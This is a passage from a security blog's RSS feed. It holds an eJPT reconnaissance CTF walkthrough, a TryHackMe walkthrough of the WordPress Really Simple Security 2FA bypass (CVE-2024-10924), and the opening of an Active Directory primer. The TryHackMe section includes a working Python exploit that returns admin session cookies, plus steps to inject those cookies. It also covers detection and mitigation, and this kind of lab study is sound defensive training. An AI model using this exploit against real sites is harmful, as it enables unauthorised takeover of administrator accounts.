<li><p>Container Apps</p>
</li>
<li><p>Traffic Manager</p>
</li>
<li><p>Azure CDN</p>
</li>
<li><p>CloudApp</p>
</li>
<li><p>Virtual Machines</p>
</li>
<li><p>Blob Storage</p>
</li>
</ul>
<h2 id="heading-references">References</h2>
<ul>
<li><p>Azure docs: <a target="_blank" href="https://learn.microsoft.com/en-us/azure/?product=popular">https://learn.microsoft.com/en-us/azure/</a></p>
</li>
<li><p>can-i-take-over-xyz repo <a target="_blank" href="https://github.com/EdOverflow/can-i-take-over-xyz/issues/35">https://github.com/EdOverflow/can-i-take-over-xyz</a></p>
</li>
<li><p>dig lookup tool <a target="_blank" href="https://toolbox.googleapps.com/apps/dig/#A/">https://toolbox.googleapps.com/apps/dig</a></p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[eJPT-CTF-1: Assessment Methodologies: Information Gathering CTF 1]]></title><description><![CDATA[This lab focuses on information gathering and reconnaissance techniques to analyze a target website. Participants will explore various aspects of the website to uncover potential vulnerabilities, sensitive files, and misconfigurations. By leveraging ...]]></description><link>https://blog.berzi.one/ejpt-ctf-1-assessment-methodologies-information-gathering-ctf-1</link><guid isPermaLink="true">https://blog.berzi.one/ejpt-ctf-1-assessment-methodologies-information-gathering-ctf-1</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Wed, 12 Feb 2025 21:34:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961420248/c0f53216-934b-410a-8d24-08a45c93b713.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>This lab focuses on information gathering and reconnaissance techniques to analyze a target website. Participants will explore various aspects of the website to uncover potential vulnerabilities, sensitive files, and misconfigurations. By leveraging investigative skills, they will learn how to identify critical information that could assist in further penetration testing or exploitation.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">the machine is within a private network, so you can’t use online enumeration tools like sublist3r, or theHarvester. I’ve used the following tools hence: gobuster, nmap and curl</div>
</div>

<h1 id="heading-lab-environment">Lab Environment</h1>
<p>A website is accessible at <a target="_blank" href="http://target.ine.local"><strong>http://target.ine.local</strong></a>. Perform reconnaissance and capture the following flags.</p>
<ul>
<li><p><strong>Flag 1:</strong> This tells search engines what to and what not to avoid.</p>
</li>
<li><p><strong>Flag 2:</strong> What website is running on the target, and what is its version?</p>
</li>
<li><p><strong>Flag 3:</strong> Directory browsing might reveal where files are stored.</p>
</li>
<li><p><strong>Flag 4:</strong> An overlooked backup file in the webroot can be problematic if it reveals sensitive configuration details.</p>
</li>
<li><p><strong>Flag 5:</strong> Certain files may reveal something interesting when mirrored.</p>
</li>
</ul>
<h1 id="heading-tools">Tools</h1>
<ul>
<li><p>Firefox</p>
</li>
<li><p>Curl</p>
</li>
<li><p>HTTrack</p>
</li>
</ul>
<hr />
<h3 id="heading-note">Note</h3>
<p>In this lab, the flag will follow the format: FLAG1{MD5Hash} OR FL@G1{MD5Hash}. For example, FLAG1{0f4d0db3668dd58cabb9eb409657eaa8}. You need to submit only the MD5 hash string, excluding the braces. For instance: 0f4d0db3668dd58cabb9eb409657eaa8.</p>
<p>This tells search engines what to and what not to avoid.<br />visit: <code>target.ine.local/robots.txt</code></p>
<p>What website is running on the target, and what is its version?</p>
<p><code>nmap -sC target.ine.local</code></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395436796/c6b31990-80f0-4e72-9a6c-773f0b54a605.png" alt class="image--center mx-auto" /></p>
<p>Directory browsing might reveal where files are stored.</p>
<p>The stack is wordpress and Apache, so google potential directories in wordpress that can have listing enabled, here’s a list:</p>
<ul>
<li><p><a target="_blank" href="http://target-site.com/wp-content/uploads/"><code>http://target-site.com/wp-content/uploads/</code></a></p>
</li>
<li><p><a target="_blank" href="http://target-site.com/wp-includes/"><code>http://target-site.com/wp-includes/</code></a></p>
</li>
<li><p><a target="_blank" href="http://target-site.com/wp-content/plugins/"><code>http://target-site.com/wp-content/plugins/</code></a></p>
</li>
<li><p><a target="_blank" href="http://target-site.com/wp-content/themes/"><code>http://target-site.com/wp-content/themes/</code></a></p>
</li>
</ul>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395543552/6d793f95-0bb0-44e3-ab6f-708bdd21b101.png" alt class="image--center mx-auto" /></p>
<p>An overlooked backup file in the webroot can be problematic if it reveals sensitive configuration details.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395603312/7d923759-60bd-4d3a-83c9-693a88ee0676.png" alt class="image--center mx-auto" /></p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395653800/cd2a818e-6e09-4d62-8ef5-05e7e3e09bfe.png" alt class="image--center mx-auto" /></p>
<p>Certain files may reveal something interesting when mirrored.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1739395845093/6e28d294-47a4-42c5-b9a6-da54fb1479a4.png" alt class="image--center mx-auto" /></p>
]]></content:encoded></item><item><title><![CDATA[Bypass Really Simple Security Tryhackme Writeup/Walkthrough]]></title><description><![CDATA[WordPress is one of the most popular open-source Content Management Systems (CMS) and it is widely used to build websites ranging from blogs to e-commerce platforms. In November 2024, a critical vulnerability was discovered in the Really Simple Secur...]]></description><link>https://blog.berzi.one/bypass-really-simple-security-tryhackme-writeupwalkthrough</link><guid isPermaLink="true">https://blog.berzi.one/bypass-really-simple-security-tryhackme-writeupwalkthrough</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Tue, 04 Feb 2025 19:25:51 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767963158389/6d997437-5539-4cc5-be3a-8ec7ab486f1b.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>WordPress is one of the most popular open-source Content Management Systems (CMS) and it is widely used to build websites ranging from blogs to e-commerce platforms. In November 2024, a critical vulnerability was discovered in the <a target="_blank" href="https://really-simple-ssl.com/">Really Simple Security plugin</a>, a widely adopted security plugin used by millions of websites. The vulnerability allowed attackers to bypass authentication and gain unauthorised access to user accounts, including those with administrative privileges. Since WordPress is a CMS, gaining administrative access sometimes allows you even to perform privilege escalation and get complete control of the server/network. Discovered by István Márton from <a target="_blank" href="https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass">Wordfence</a>, this flaw was assigned a critical severity rating and CVE-ID 2024-10924.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1737010496955.svg" alt="WordPress admin login panel with a transparent red skull as a background image." /></p>
<h2 id="heading-learning-objective">Learning Objective</h2>
<ul>
<li><p>Exploit a WordPress authentication through CVE 2024-10924</p>
</li>
<li><p>How the exploit works</p>
</li>
<li><p>Protection and mitigation measures</p>
</li>
</ul>
<h2 id="heading-room-pre-requisites">Room Pre-requisites</h2>
<p>Understanding the following topics is recommended before starting the room:</p>
<ul>
<li><p><a target="_blank" href="https://tryhackme.com/room/howwebsiteswork">How Websites Work</a></p>
</li>
<li><p><a target="_blank" href="https://tryhackme.com/room/protocolsandservers">Protocols and Severs</a></p>
</li>
<li><p><a target="_blank" href="https://tryhackme.com/r/room/webapplicationbasics">Web Application Basics</a></p>
</li>
</ul>
<h2 id="heading-connecting-to-the-machine">Connecting to the Machine</h2>
<p>You can start the virtual machine by clicking the <code>Start Machine</code> button, which will start the machine in a split-screen view. If the VM is not visible, use the blue <code>Show Split View</code> button at the top of the page. Please wait 1-2 minutes after the system boots completely to let the auto scripts run successfully.</p>
<p>Let's begin!</p>
<p>Answer the questions below</p>
<p>I can successfully connect with the machine.</p>
<p>The vulnerability in CVE-2024-10924 arises due to non-adherence to secure coding practices while handling REST API endpoints in the WordPress Really Simple Security plugin. This plugin is widely used to add additional security measures, including Two-Factor Authentication (2FA). Unfortunately, improper validation during the authentication process allows attackers to exploit API endpoints and bypass critical checks.</p>
<h2 id="heading-wordpress-entry-points">WordPress Entry Points</h2>
<p>WordPress offers various entry points for interaction:</p>
<ul>
<li><p><strong>Admin Dashboard</strong>: Used for administrative management via the <code>/wp-admin</code> endpoint. Only authenticated users with valid credentials can access this interface.</p>
</li>
<li><p><strong>Public Interface</strong>: Managed by the index.php file in the root directory, it serves content to visitors.</p>
</li>
<li><p><strong>REST API</strong>: The API provides a flexible entry point for developers to manage site data programmatically. It requires proper authentication to access sensitive resources.</p>
</li>
</ul>
<p>The CVE-2024-10924 vulnerability targets REST API endpoints configured for the plugin’s Two-Factor Authentication (2FA) mechanism. It enables attackers to bypass authentication by manipulating parameters used during API interactions. The vulnerability occurred due to insufficient validation of user-supplied values, specifically in the <code>skip_onboarding</code> feature.</p>
<h2 id="heading-how-the-vulnerability-works">How the Vulnerability Works</h2>
<p>To understand how the vulnerability works, let's have a source code review to understand the control flow through the different pages. You can review the source code in the <code>/var/www/html/wp-content/plugins/really-simple-ssl/security/wordpress/two-fa</code> folder in the attached VM. The plugin contains a PHP class called <code>Rsssl_Two_Factor_On_Board_Api</code>,  which includes the following essential methods that lead to a bypassing authentication vulnerability:</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1737010730654.svg" alt="Functions involved for triggering the vulnerability." /></p>
<ul>
<li><p><strong>skip_onboarding</strong>: Skips or manages the 2FA onboarding process for a user by validating their credentials and redirecting them after authentication. It begins by extracting parameters from the request, including <code>user_id</code>, <code>login_nonce</code>, and <code>redirect_to</code>. These parameters are then passed to the <code>check_login_and_get_user</code> function for validation. If a valid user object is returned, the method calls <code>authenticate_and_redirect</code>, redirecting the user to the <code>redirect_to</code> URL.</p>
</li>
<li><pre><code class="lang-php">      <span class="hljs-comment">/**
       * Skips the onboarding process for the user.
       *
       * <span class="hljs-doctag">@param</span> WP_REST_Request $request The REST request object.
       *
       * <span class="hljs-doctag">@return</span> WP_REST_Response The REST response object.
       */</span>

      <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">skip_onboarding</span>(<span class="hljs-params"> WP_REST_Request $request </span>): <span class="hljs-title">WP_REST_Response</span> </span>{
          $parameters = <span class="hljs-keyword">new</span> Rsssl_Request_Parameters( $request );
          <span class="hljs-comment">// As a double we check the user_id with the login nonce.</span>
          $user = <span class="hljs-keyword">$this</span>-&gt;check_login_and_get_user( (<span class="hljs-keyword">int</span>)$parameters-&gt;user_id, $parameters-&gt;login_nonce );
          <span class="hljs-keyword">return</span> <span class="hljs-keyword">$this</span>-&gt;authenticate_and_redirect( $parameters-&gt;user_id, $parameters-&gt;redirect_to );
</code></pre>
<p>  The vulnerability lies in the <code>skip_onboarding</code> method not validating the return value of <code>check_login_and_get_user</code>. Even if the function returns null, indicating invalid credentials, the process redirects the user, granting unauthorised access. The call to <code>skip_onboarding</code> is carried out through the REST API endpoint <code>/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding</code> with POST parameters <strong>user_id</strong>, <strong>login_none</strong> and <strong>redirect_to</strong> URL. </p>
</li>
</ul>
<ul>
<li><strong>check_login_and_get_user</strong>: The <code>check_login_and_get_user</code> function is responsible for validating the <strong>user_id</strong> and <strong>login_nonce</strong>. It first checks the validity of the <strong>login_nonce</strong> using the <strong>verify_login_nonce function</strong>. If the nonce is invalid, it returns null, ensuring an authentication failure. If the nonce is valid, it retrieves the user object associated with the provided <strong>user_id</strong> and returns it.</li>
</ul>
<pre><code class="lang-php">    <span class="hljs-comment">/**
     * Verifies a login nonce, gets user by the user id, and returns an error response if any steps fail.
     *
     * <span class="hljs-doctag">@param</span> int    $user_id The user ID.
     * <span class="hljs-doctag">@param</span> string $login_nonce The login nonce.
     *
     * <span class="hljs-doctag">@return</span> WP_User|WP_REST_Response
     */</span>

    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">check_login_and_get_user</span>(<span class="hljs-params"> <span class="hljs-keyword">int</span> $user_id, <span class="hljs-keyword">string</span> $login_nonce </span>) </span>{
        <span class="hljs-keyword">if</span> ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
            <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> WP_REST_Response( <span class="hljs-keyword">array</span>( <span class="hljs-string">'error'</span> =&gt; <span class="hljs-string">'Invalid login nonce'</span> ), <span class="hljs-number">403</span> );
        }
</code></pre>
<p>The problem arises because <code>skip_onboarding</code> does not properly handle the null response from this function. While the function does its job of identifying invalid credentials, the calling method ignores its return value, allowing the process to continue as if the authentication was successful.</p>
<ul>
<li><strong>authenticate_and_redirect</strong>: This function redirects the user after successful authentication. It assumes that the earlier methods have already authenticated the user. It uses the <strong>user_id</strong> and <strong>redirect_to</strong> parameters to redirect the user to the desired URL.</li>
</ul>
<pre><code class="lang-php"><span class="hljs-comment">/**
     * Sets the authentication cookie and returns a success response.
     *
     * <span class="hljs-doctag">@param</span> int    $user_id The user ID.
     * <span class="hljs-doctag">@param</span> string $redirect_to The redirect URL.
     *
     * <span class="hljs-doctag">@return</span> WP_REST_Response
     */</span>

    <span class="hljs-keyword">private</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">authenticate_and_redirect</span>(<span class="hljs-params"> <span class="hljs-keyword">int</span> $user_id, <span class="hljs-keyword">string</span> $redirect_to = <span class="hljs-string">''</span> </span>): <span class="hljs-title">WP_REST_Response</span> </span>{
        <span class="hljs-comment">// Okay checked the provider now authenticate the user.</span>
        wp_set_auth_cookie( $user_id, <span class="hljs-literal">true</span> );
        <span class="hljs-comment">// Finally redirect the user to the redirect_to page or to the home page if the redirect_to is not set.</span>
        $redirect_to = $redirect_to ?: home_url();
        <span class="hljs-keyword">return</span> <span class="hljs-keyword">new</span> WP_REST_Response( <span class="hljs-keyword">array</span>( <span class="hljs-string">'redirect_to'</span> =&gt; $redirect_to ), <span class="hljs-number">200</span> );
    }
</code></pre>
<p>However, this function is called even if authentication fails. Therefore, the attacker is seamlessly redirected to the desired page, bypassing the authentication mechanism. Such instances are the first of their kind, and normally, such security flaws have never been seen in a renowned plugin.</p>
<p>It is important to note that the vulnerability only works for the accounts against whom 2FA is <strong>enabled</strong>. The chain of methods reveals how improper validation leads to a critical security flaw:</p>
<ul>
<li><p>In <strong>skip_onboarding</strong>: The return value from <code>check_login_and_get_user</code> is not validated, allowing a <strong>null</strong> response to be treated as a valid user.</p>
</li>
<li><p>In <strong>check_login_and_get_user</strong>: While it correctly identifies invalid credentials, it relies on the caller to handle its return value, which does not happen.</p>
</li>
<li><p>In <strong>authenticate_and_redirect</strong>: It blindly redirects users based on the parameters passed to it, assuming they have been properly authenticated.</p>
</li>
</ul>
<p>Now that we understand the concept behind the vulnerability, let's exploit it in the next task.</p>
<p>Answer the questions below</p>
<p>What is the class name that holds the important three functions discussed in the task?</p>
<p><code>Rsssl_Two_Factor_On_Board_Api</code></p>
<p>What is the function name that accepts user_id and login_nonce as arguments and validates them?</p>
<p><code>check_login_and_get_user</code></p>
<p>In this task, we will learn how to exploit CVE-2024-10924. Exploiting of this vulnerability is straightforward and involves sending a crafted POST request to the vulnerable <code>/reallysimplessl/v1/two_fa/skip_onboarding</code> endpoint. From the previous task, we learned that the endpoint accepts three key parameters: the user's ID attempting to skip 2FA onboarding, a nonce value which is not validated correctly, and the URL to redirect the user after the operation.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1737010782706.svg" alt="Exploiting wordpress admin panel through a POST call." /></p>
<h2 id="heading-exploitation">Exploitation</h2>
<p>In the attached VM, open the browser and visit the website <a target="_blank" href="http://vulnerablewp.thm:8080/wp-admin">http://vulnerablewp.thm:8080/wp-admin</a>. We will see that the website is protected through a login panel. Our goal is to retrieve credentials against a WordPress user admin with <strong>user_id</strong> 1.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733302763679.png" alt="Login panel in wordpress." /></p>
<p>Below is a simple Python script that sends a POST request to the vulnerable endpoint. This script extracts and displays the cookies in response to authenticate the user.</p>
<pre><code class="lang-python"><span class="hljs-keyword">import</span> requests
<span class="hljs-keyword">import</span> urllib.parse
<span class="hljs-keyword">import</span> sys

<span class="hljs-keyword">if</span> len(sys.argv) != <span class="hljs-number">2</span>:
    print(<span class="hljs-string">"Usage: python exploit.py &lt;user_id&gt;"</span>)
    sys.exit(<span class="hljs-number">1</span>)

user_id = sys.argv[<span class="hljs-number">1</span>]

url = <span class="hljs-string">"http://vulnerablewp.thm:8080/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding"</span>
data = {
    <span class="hljs-string">"user_id"</span>: int(user_id),  <span class="hljs-comment"># User ID from the argument</span>
    <span class="hljs-string">"login_nonce"</span>: <span class="hljs-string">"invalid_nonce"</span>,  <span class="hljs-comment"># Arbitrary value</span>
    <span class="hljs-string">"redirect_to"</span>: <span class="hljs-string">"/wp-admin/"</span>  <span class="hljs-comment"># Target redirection</span>
}

<span class="hljs-comment"># Sending the POST request</span>
response = requests.post(url, json=data)

<span class="hljs-comment"># Checking the response</span>
<span class="hljs-keyword">if</span> response.status_code == <span class="hljs-number">200</span>:
    print(<span class="hljs-string">"Request successful!\n"</span>)

    <span class="hljs-comment"># Extracting cookies</span>
    cookies = response.cookies.get_dict()
    count = <span class="hljs-number">1</span>

    <span class="hljs-keyword">for</span> name, value <span class="hljs-keyword">in</span> cookies.items():
        decoded_value = urllib.parse.unquote(value)  <span class="hljs-comment"># Decode the URL-encoded cookie value</span>
        print(<span class="hljs-string">f"Cookie <span class="hljs-subst">{count}</span>:"</span>)
        print(<span class="hljs-string">f"Cookie Name: <span class="hljs-subst">{name}</span>"</span>)
        print(<span class="hljs-string">f"Cookie Value: <span class="hljs-subst">{decoded_value}</span>\n"</span>)
        count += <span class="hljs-number">1</span>
<span class="hljs-keyword">else</span>:
    print(<span class="hljs-string">"Request failed!"</span>)
    print(<span class="hljs-string">f"Status Code: <span class="hljs-subst">{response.status_code}</span>"</span>)
    print(<span class="hljs-string">f"Response Text: <span class="hljs-subst">{response.text}</span>"</span>)
</code></pre>
<p>The above Python code is already available on the <strong>Desktop</strong> of the attached VM with the name <code>exploit.py</code>. Open the terminal and execute the script using the the following command:</p>
<p>Terminal</p>
<pre><code class="lang-cpp">           ubuntu@tryhackme:~/Desktop$ python3 exploit.py <span class="hljs-number">1</span>
Request successful!

Cookie <span class="hljs-number">1</span>:
Cookie Name: wordpress_logged_in_eb51341dc89ca85477118d98a618ef6f
Cookie Value: admin|<span class="hljs-number">1734510575</span>|oROXr3wB4mKDymD0koHZenGeStwYsqZbMcWqOlm4QI
Cookie <span class="hljs-number">2</span>:
Cookie Name: wordpress_eb51341dc89ca85477118d98a618ef6f
Cookie Value: admin|<span class="hljs-number">1734510575</span>|oROXr3wB4mKDymD0koHZenGeStwYsqZbMcWqOlm4QI2|c29b74eaa
</code></pre>
<p>The above script sends a POST request to the WordPress endpoint and retrieves the authenticated cookie values for the specified <code>user_id</code>, with 1 typically being assigned to the first user on the website.</p>
<p><strong>Note</strong>: The cookie values in the output above are intentionally omitted for the <code>user_id</code> 1.</p>
<h2 id="heading-from-cookies-to-admin-login">From Cookies to Admin Login</h2>
<p>Now, we will use the cookies retrieved earlier to log in as admin on the WordPress site. While on the <code>vulnerablewp.thm:8080</code> page, you can manually inject the cookies into Firefox. To do this, right-click on the page and select <strong>Inspect</strong>, then open the browser's developer tools.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733311257718.png" alt="Accessing dev console through inspect element." /></p>
<p>Once the <strong>Developer</strong> Tools panel is open, look for the <strong>Storage</strong> tab at the top. Click on it to access the storage-related data. Locate and expand the <strong>Cookies</strong> section on the left-hand sidebar of the <strong>Storage</strong> tab. Under <strong>Cookies</strong>, you will see a list of domains for which cookies are stored. Select <code>http://vulnerablewp.thm:8080</code> from this list to view all cookies associated with the site.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733311290844.png" alt="Adding cookies in Firefox." /></p>
<p>With the cookies table visible, you can now add the cookies retrieved earlier. To do this, click on the plus sign (+) and a new row will appear in the table. Start by double-clicking the empty <code>Name</code> field in the new row and paste the name of the cookie, such as <code>wordpress_logged_in_xxx</code>. After pasting the cookie name, double-click the empty <code>Value</code> field and paste the cookie value you retrieved earlier. For example, a typical value might look like <code>admin|1734424855|GmsuEza35K2GtvS57bhIVl5CbFZKVlpuYxEbIYVLk4</code>. Repeat the same step for the other cookie as well. A simple visual representation for adding a cookie <code>test</code> with the value of  <code>value</code> is shown below:</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733313998824.gif" alt="Steps to add cookie in browser" /></p>
<p>After adding the cookies, close the Developer Tools panel, enter the WordPress admin dashboard link <code>http://vulnerablewp.thm:8080/wp-admin</code> in the address bar, and press Enter. This will apply the injected cookies to your session. When the page reloads, you should be logged in as the <strong>user_id</strong> 1. If everything was done correctly, you will see the admin interface as shown below:</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733315520660.png" alt="Dashboard after logging in wordpress." /></p>
<p>Once logged in as the <strong>user_id</strong> 1, navigate to <a target="_blank" href="http://vulnerablewp.thm:8080/wp-admin/profile.php">this</a> link to get details about your profile, such as your username, email address, and personal settings.</p>
<h2 id="heading-adding-cookies-in-browers">Adding Cookies in Browers</h2>
<p>There are multiple ways to add cookies in the browser. If you have difficulty using the above method, you can add cookies to the browser using an extension like <strong>Cookiebro Editor</strong>. Follow the steps provided in the extension below to add or edit cookies. Ensure the expiration date for the cookies is set to a future value to keep them valid.</p>
<p></p><details><summary>Click here to watch the walkthrough for injecting cookies using a super easy Firefox extension!</summary><div data-type="detailsContent"></div></details><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733344502509.gif" alt /><p></p>
<p>Now that you understand how to exploit the vulnerability, let's review some mitigation measures for prevention.</p>
<p>Answer the questions below</p>
<p>What email address is associated with the username admin (<strong>user_id</strong> 1)?</p>
<p><code>admin@fake.thm</code></p>
<p>Run the <code>exploit.py</code> script with argument <code>1</code> open the cookies in storage of browser dev console. add the two new cookies for <code>admin</code> then visit the <code>/wp-admin</code> endpoint</p>
<p>What is the first name value for the username tesla (<strong>user_id</strong> 2)?</p>
<p><code>Jack</code></p>
<p>open the cookie storage once again while logged in, open the cookie storage and run the <code>exploit.py</code> with <code>2</code> as argument for <code>tesla</code> user, then refresh the dashboard to enter the <code>tesla</code> dashboard, go to profiles and get the first name!</p>
<p>What is the HTTP method required for exploiting the vulnerability? (GET/POST)</p>
<p><code>POST</code></p>
<p>Just see the scripts above</p>
<p>In the previous task, we learned that the vulnerability in CVE-2024-10924 can be exploited by making a simple API call to a specific endpoint. Now, we will discuss a few detection and mitigation techniques. The challenge lies in detecting such exploitation, as legitimate API calls to the endpoint can also occur, making distinguishing between normal and malicious activity difficult.</p>
<h2 id="heading-examining-logs">Examining Logs</h2>
<p>To identify exploitation attempts of CVE-2024-10924, we can rely on various logs that capture API activity, events, etc. Below are some methods to examine logs for potential exploitation:</p>
<ul>
<li><p><strong>Check Weblogs for API Calls</strong>: Focus on detecting requests to the vulnerable endpoint, <code>/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding</code> with unusual patterns like repeated POST requests to the endpoint, requests with varying <code>user_id</code>  or <code>login_nonce</code> parameters, indicating brute force attempts, etc.</p>
</li>
<li><p><strong>Analyse Authentication Logs</strong>: Look for login attempts where <strong>two-factor authentication</strong> is bypassed. Indicators of potential exploitation include failed login attempts followed by a sudden successful login without 2FA validation, logins to administrative accounts from unexpected geolocations or devices, etc.</p>
</li>
<li><p><strong>SIEM Query</strong>: If you are using a <strong>SIEM solution</strong> like OpenSearch, create a query to filter and visualise logs for potential exploitation attempts. A sample query could be:</p>
</li>
</ul>
<pre><code class="lang-c">method:POST AND path:<span class="hljs-string">"/reallysimplessl/v1/two_fa/skip_onboarding"</span>
</code></pre>
<p><strong>Note</strong>: If the above query generates results, it does not necessarily confirm exploitation. However, when combined with other indicators, like previous suspicious requests, it can provide better insight into potential attacks.</p>
<h2 id="heading-mitigation-steps">Mitigation Steps</h2>
<p>As part of the mitigation process, the developers of the Really Simple Security plugin have officially released a <a target="_blank" href="https://github.com/Really-Simple-Plugins/really-simple-ssl/blob/master/">patch</a> addressing CVE-2024-10924. A source code review of the updated version reveals that additional validation and error-handling steps have been implemented to handle the authentication bypass.</p>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733226774594.png" alt="Mitigation steps added by plugin developers." /></p>
<p>Here are some additional mitigation measures to secure your website:</p>
<ul>
<li><strong>Apply the Official Patch</strong>: Update the Really Simple Security plugin to version 9.1.2 or later, which includes a fix for the vulnerability and also enables <strong>auto updates</strong>.</li>
</ul>
<p><img src="https://tryhackme-images.s3.amazonaws.com/user-uploads/62a7685ca6e7ce005d3f3afe/room-content/62a7685ca6e7ce005d3f3afe-1733227110737.png" alt="Auto-update feature in WordPress." /></p>
<ul>
<li><p>Update the alerts in the SIEM so you are notified as soon as an exploitation attempt is made.</p>
</li>
<li><p>Developers must implement proper input validation and rigorous error handling for all API endpoints to prevent the processing of malicious or invalid parameters.</p>
</li>
</ul>
<p>Answer the questions below</p>
<p>As a security engineer, you have identified a call to the <strong>/reallysimplessl/v1/two_fa/skip_onboarding</strong></p>
<p>endpoint from weblogs. Does that confirm that the user is 100% infected? (yea/nay)</p>
<p><code>nay</code></p>
<p>I have understood the detection and mitigation techniques.</p>
<p>This is it.</p>
<p>As WordPress is one of the most widely used CMS platforms and its plugins are frequent targets for attackers, it is highly recommended that all plugins, including Really Simple Security, be updated to avoid exploitation of such vulnerabilities.</p>
<p>In this room, we covered the following:</p>
<ul>
<li><p>The workings of the critical vulnerability in the Really Simple Security plugin (CVE ID 2024-10924).</p>
</li>
<li><p>How attackers can exploit the vulnerability to bypass two-factor authentication and gain unauthorised access using crafted API calls.</p>
</li>
<li><p>Methods to detect exploitation attempts in logs, including web server logs and SIEM tools.</p>
</li>
<li><p>Effective mitigation strategies include patching the plugin and following secure coding practices.</p>
</li>
</ul>
<p>Let us know what you think about this room on our <a target="_blank" href="https://discord.gg/tryhackme">Discord channel</a> or <a target="_blank" href="http://twitter.com/realtryhackme">X account</a>. If you liked this room, feel free to look at our <a target="_blank" href="https://tryhackme.com/module/authentication">Authentication</a> module, which covers advanced techniques to bypass authentication mechanisms.</p>
]]></content:encoded></item><item><title><![CDATA[Active Directory: Hell-bent on Kerberos]]></title><description><![CDATA[Sounds darn good
I know right? It’s equally much of a headache. Kerberos is an authentication protocol that’s made and maintained by MIT and used in numerous applications like in Windows Active Directory. Kerberos was derived from the greek word “Cer...]]></description><link>https://blog.berzi.one/hell-bent-on-kerberos</link><guid isPermaLink="true">https://blog.berzi.one/hell-bent-on-kerberos</guid><dc:creator><![CDATA[berzelion]]></dc:creator><pubDate>Tue, 21 Jan 2025 07:28:28 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1767961558319/a9fbc22c-2c21-41fa-a190-9432c975bb5c.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2 id="heading-sounds-darn-good">Sounds darn good</h2>
<p>I know right? It’s equally much of a headache. Kerberos is an authentication protocol that’s made and maintained by MIT and used in numerous applications like in Windows Active Directory. Kerberos was derived from the greek word “Cerberus”.</p>
<div data-node-type="callout">
<div data-node-type="callout-emoji">💡</div>
<div data-node-type="callout-text">In Greek mythology, Cerberus, often referred to as the hound of Hades, is a multi-headed dog that guards the gates of the underworld to prevent the dead from leaving.<a target="_self" class="y171A xmq3o Q7PwXb a-no-hover-decoration" href="https://en.wikipedia.org/wiki/Cerberus"> Wikipedia</a></div>
</div>

<h2 id="heading-wait-whats-active-directory">Wait, what’s Active Directory?</h2>
<h3 id="heading-some-basic-terms-and-objects">Some Basic Terms and Objects</h3>
<p>Active Directory is a central repository that centralises administration of components of windows machines within a Domain (or a network). There’s something called Active Directory domain service, which holds info for all objects in network. What’s an object? Users, Groups, Machines, the usual deal.</p>
<p>types of objects include security principals (can be auth’d by domain and can be assigned perms over resources), machines (saved as &lt;machine_name&gt;$ )</p>
<p>security groups: groups of security principals (also considered as security principals!), here’s a priority-wise list of security groups…</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1737381591731/b531a147-6892-4695-9e4d-5edf4bf299f0.png" alt class="image--center mx-auto" /></p>
<h3 id="heading-organisational-units">Organisational units</h3>
<p>Organisational units group users and machines with similar permission sets</p>
<ol>
<li><p>builtin (default groups)</p>
</li>
<li><p>computers</p>
</li>
<li><p>DCs</p>
</li>
<li><p>user</p>
</li>
<li><p>managed service accounts (every resource requires a service account)</p>
</li>
</ol>
<p><img src="https://theitbros.com/wp-content/uploads/2023/09/how-to-create-ou-in-active-directory.png" alt="Active Directory OU (Organizational Unit): Ultimate Guide – TheITBros" /></p>
